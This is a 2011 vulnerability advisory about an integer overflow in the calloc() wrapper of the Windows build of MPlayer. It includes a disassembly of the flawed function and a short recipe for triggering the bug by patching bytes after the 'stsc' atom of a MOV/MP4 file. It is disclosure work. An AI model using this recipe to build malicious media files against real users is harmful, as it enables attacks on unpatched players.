####################################################################### Luigi Auriemma Application: MPlayer on Windows http://oss.netfarm.it/mplayer-win32.php http://www.mplayerhq.hu Versions: <= r33883 4.2.5 Platforms: Windows build only Bug: integer overflow Exploitation: local and remote Date: 02 Sep 2011 (found 02 Jun 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "MPlayer on Windows" is the official win32 build of the well known mplayer software (http://www.mplayerhq.hu) and this binary is used in all the Windows projects and GUIs based on such software like SMPlayer. ####################################################################### ====== 2) Bug ====== Due to some compatibility problems with the compiler mplayer on Windows uses some "wrapped" allocation functions and one of them is the calloc() replacement that doesn't protect against integer overflow vulnerabilities because it uses a 32bit multiplication for calculating the size of the memory to allocate: 010181D5 /$ 55 PUSH EBP 010181D6 |. 89E5 MOV EBP,ESP 010181D8 |. 83EC 28 SUB ESP,28 010181DB |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 010181DE |. 0FAF45 0C IMUL EAX,DWORD PTR SS:[EBP+C] 010181E2 |. 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 010181E5 |. C74424 04 10000000 MOV DWORD PTR SS:[ESP+4],10 010181ED |. 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 010181F0 |. 890424 MOV DWORD PTR SS:[ESP],EAX 010181F3 |. E8 BBFDFFFF CALL mplayer.01017FB3 010181F8 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 010181FB |. 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 010181FE |. 894424 08 MOV DWORD PTR SS:[ESP+8],EAX 01018202 |. C74424 04 00000000 MOV DWORD PTR SS:[ESP+4],0 0101820A |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0101820D |. 890424 MOV DWORD PTR SS:[ESP],EAX 01018210 |. E8 EB310100 CALL 01018215 |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 01018218 |. C9 LEAVE 01018219 \. C3 RETN The resulted integer overflow can be exploited in various ways because some versions ago mplayer adopted calloc() and removed many of the previous inline security checks just for the ability of this function to avoid similar bugs. The original source code of the wrapped functions used in the win32 build is available here: http://oss.netfarm.it/mplayer/misc/yy_alt_alloc.diff Note that the original mplayer code doesn't use this modification so it's not vulnerable, the bug affects specifically the MPlayer on Windows builds. ####################################################################### =========== 3) The Code =========== The problem can be replicated in tons of ways and one of them is taking a MOV/MP4 file, searching the "stsc" atom and placing the bytes 10 00 00 01 (0x10000001 in big endian) 8 bytes after it overwriting those existent. ####################################################################### ====== 4) Fix ====== The author or the win32 porting has been contacted a couple of months ago but there is no fix yet. #######################################################################